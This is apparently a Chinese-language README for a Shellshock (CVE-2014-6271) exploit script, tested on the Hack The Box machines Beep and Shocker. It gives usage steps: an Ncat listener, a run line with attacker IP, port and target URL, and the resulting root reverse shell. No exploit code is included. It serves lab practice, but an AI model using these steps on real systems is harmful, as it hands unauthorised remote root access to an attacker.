Shellshock 漏洞利用,又名 CVE-2014-6271。
已在 Bash 3.2 和 Bash 4.2 上测试。
有关该漏洞的更多信息,请访问:https://nvd.nist.gov/vuln/detail/CVE-2014-6271
该漏洞利用主要在 Hack The Box 的以下靶机上进行了测试:
Beep 靶机:https://app.hackthebox.eu/machines/BeepShocker 靶机:https://app.hackthebox.eu/machines/Shocker否则,如果 /cgi-bin/ 目录返回 403,请尝试使用好的字典
枚举该目录中的文件,查找 .sh 或 .cgi 扩展名。
注意:不要忘记设置你的 TCP 监听器,否则在 testRevShell 调用检查期间,漏洞利用可能会给你
一个误报
首先,我们可以通过运行 shellshock.py -h 来查看该漏洞利用所接受的参数:
然后,我们可以在自己选择的端口上设置一个 Ncat 监听器,这里我选择了 45
接下来,我们可以通过提供其所需的全部参数来运行该漏洞利用:
shellshock.py [OUR_IP] [OUR_LISTENNING_PORT] [TARGET_URL]
如你所见,这里的目标 URL 是 Web 服务器在该靶机上进行身份验证时发送 POST 请求的地址
从输出中可以看到,该漏洞利用尝试通过 SSL 使用多种 TLS 版本发送 payload,直到成功为止
然后我们就得到了反弹 shell!幸运的是,该 Web 服务器以 root 身份运行。